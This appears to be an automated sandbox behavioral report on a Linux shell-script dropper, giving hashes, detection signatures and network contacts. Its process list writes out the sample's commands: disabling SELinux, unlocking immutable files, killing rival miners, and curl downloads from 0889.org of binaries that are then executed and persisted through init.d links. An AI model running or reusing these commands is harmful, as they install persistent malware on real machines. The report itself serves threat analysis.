SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedwN5x5f

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedv6RR3s

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

/etc/init.d/sedoUuasG

MD5 08213cf202f2552298f62a007487e01c
SHA1 1f143ee220797f30367d4de9e65ad9ac52fd8ea4
SHA256 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e
SHA512 b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33

/etc/init.d/sedL7L6fV

MD5 019ab1c1cb24b368b0965898746bb122
SHA1 8146b37003a86a1348c6b165b32a247ce6907525
SHA256 deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818
SHA512 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a

/etc/init.d/sedAnGcRa

MD5 338975eb635877703fc066e005f916d9
SHA1 5474296634bf9e527a9a865b0cb182e61a2b66bf
SHA256 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7
SHA512 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8

/etc/init.d/sedas3nbc

MD5 69497d0565055f626ee2bc84f818ce0f
SHA1 b5ca73e0fef84a5aa8f0155f160952c4385045b8
SHA256 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da
SHA512 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec

/etc/init.d/sed3ewBKk

MD5 e4da2ae5c153148fad0b3f6e5e7ce61e
SHA1 3ef89c60b9f66bad7834dc5621772d474e3e36d9
SHA256 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923
SHA512 dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10

/etc/init.d/sedkajU1t

MD5 4bf46072f9f13b2e38d58a053def37d5
SHA1 94e4b56f7a5d40a40f256a474e244642ad778a4e
SHA256 a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf
SHA512 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de

/tmp/sh-thd.y06k78

MD5 2ff9930962f5ed39a68bfabddc3551ac
SHA1 9f99fbefee4a609f403025ed510c2fa93982303b
SHA256 d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7
SHA512 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df

/etc/init.d/crontabs

MD5 f21f5717d956b60f695d350bbab05716
SHA1 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f
SHA256 c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e
SHA512 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2

/usr/local/sbin/mcron

MD5 7cd0552f2eb740d23790d82134d0adb8
SHA1 c600bdcf3ba70156856b6712070a3c65368e2e62
SHA256 62b44a654916d6e52af20897cbcf39e4134b4c79d2498fbbc08987cc392b5788
SHA512 43309fdf0e4c2a1a7503488bd0493ebd1cb66cecf2fdf19dd76be9848a80be1478fcc0662c382ad8230ecf4963d89b8c1d58c33670db8777d136ae089517e9a7

/usr/bin/bsd-port/knerl

MD5 8a51a05df6f69f2a6fc4c4e376b65f70
SHA1 1b68e2894d97363dcd9f2d7e42724dfc58e0a260
SHA256 7f048a07a9c6166054ae0a1fe9af0c38769ff6fc5189ada4e4144c71e5d24994
SHA512 505595aeeae9018dc0d31e158899d620ef4fe1d9d8e510ee10a82aec889202e4994a3e387f628033a90aa53d633c1e7c7865a98cfdfb147ecc950b3c1376a37d

/etc/init.d/grub

MD5 81bb3911dc14f3eb53d0700a4aa50475
SHA1 89531a3a74e100f51118a6c12d7a4e8d346eeac4
SHA256 8027b789feb011489894fbac26a9d3e4ecc60972d85c5df7438c3dc390fc1962
SHA512 632e4fc0d9be24c69faa8fd0e702f25a6530698908401cc868d2c294c83703b99c1378196b1b4456bc6e1d1bf364960e18427e92509d6c5bb94b4cb4d7e78995

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-mipsel-20240418-en

Max time kernel

20s

Max time network

22s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /usr/local/sbin/mcron /usr/local/sbin/mcron N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sedcFdtji /bin/sed N/A
File opened for modification /etc/init.d/sedUWKnOM /bin/sed N/A
File opened for modification /etc/init.d/sedecL8Uf /bin/sed N/A
File opened for modification /etc/init.d/sedlS4UXu /bin/sed N/A
File opened for modification /etc/init.d/sed894o2H /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedDJH83P /bin/sed N/A
File opened for modification /etc/init.d/sed2doE35 /bin/sed N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedUppmtj /bin/sed N/A
File opened for modification /etc/init.d/sedaOm0nf /bin/sed N/A
File opened for modification /etc/init.d/sedm74Teg /bin/sed N/A
File opened for modification /etc/init.d/sed7blsk4 /bin/sed N/A
File opened for modification /etc/init.d/sedmurBwi /bin/sed N/A
File opened for modification /etc/init.d/sedpQr9ow /bin/sed N/A
File opened for modification /etc/init.d/sedFiM310 /bin/sed N/A
File opened for modification /etc/init.d/sedlZSDfw /bin/sed N/A
File opened for modification /etc/init.d/sed0t4SpK /bin/sed N/A
File opened for modification /etc/init.d/grub /usr/bin/curl N/A
File opened for modification /etc/init.d/sedTtUAO1 /bin/sed N/A
File opened for modification /etc/init.d/sedmnWxVv /bin/sed N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/local/sbin/mcron /usr/bin/curl N/A
File opened for modification /usr/bin/bsd-port/knerl /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/684/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/691/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/117/status /usr/bin/pkill N/A
File opened for reading /proc/798/cmdline /usr/bin/pkill N/A
File opened for reading /proc/81/cmdline /usr/bin/pkill N/A
File opened for reading /proc/377/cmdline /usr/bin/pkill N/A
File opened for reading /proc/350/status /usr/bin/pkill N/A
File opened for reading /proc/692/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/691/status /usr/bin/pkill N/A
File opened for reading /proc/349/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/695/status /usr/bin/pkill N/A
File opened for reading /proc/149/cmdline /usr/bin/pkill N/A
File opened for reading /proc/660/cmdline /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/24/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/392/cmdline /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/75/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/695/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/669/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/77/cmdline /usr/bin/pkill N/A
File opened for reading /proc/237/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/status /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/782/status /usr/bin/pkill N/A
File opened for reading /proc/237/cmdline /usr/bin/pkill N/A
File opened for reading /proc/685/status /usr/bin/pkill N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/684/status /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/378/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/374/status /usr/bin/pkill N/A
File opened for reading /proc/75/status /usr/bin/pkill N/A
File opened for reading /proc/694/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/151/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.9HUJKD /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.fSh6CI /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

/bin/chmod

[chmod +x /usr/local/sbin/mcron]

/usr/bin/chattr

[chattr +ia /usr/local/sbin/mcron]

/usr/bin/dirname

[dirname /usr/bin/bsd-port/knerl]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]

/bin/chmod

[chmod +x /usr/bin/bsd-port/knerl]

/usr/bin/chattr

[chattr +ia /usr/bin/bsd-port/knerl]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]

/bin/chmod

[chmod +x /etc/init.d/grub]

/usr/bin/chattr

[chattr +ia /etc/init.d/grub]

/usr/local/sbin/mcron

[/usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp

Files

/etc/sedwfmGpN

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedTtUAO1

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sedm74Teg

MD5 ce2de503acc3de02f544571e89d4d717
SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sedmnWxVv

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedDJH83P

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sed2doE35

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/sedcFdtji

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedpQr9ow

MD5 0eb380bbeb5db57a59e298a074f1f9f3
SHA1 284b88849b3dfd7f6c02c0d05c77a01292c8a679
SHA256 f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2
SHA512 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88

/etc/init.d/sedUWKnOM

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sed7blsk4

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sedecL8Uf

MD5 82698019c962069b438bd2a82d9fa1e7
SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedUppmtj

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedlZSDfw

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

/etc/init.d/sed0t4SpK

MD5 08213cf202f2552298f62a007487e01c
SHA1 1f143ee220797f30367d4de9e65ad9ac52fd8ea4
SHA256 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e
SHA512 b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33

/etc/init.d/sedFiM310

MD5 019ab1c1cb24b368b0965898746bb122
SHA1 8146b37003a86a1348c6b165b32a247ce6907525
SHA256 deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818
SHA512 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a

/etc/init.d/sedaOm0nf

MD5 338975eb635877703fc066e005f916d9
SHA1 5474296634bf9e527a9a865b0cb182e61a2b66bf
SHA256 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7
SHA512 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8

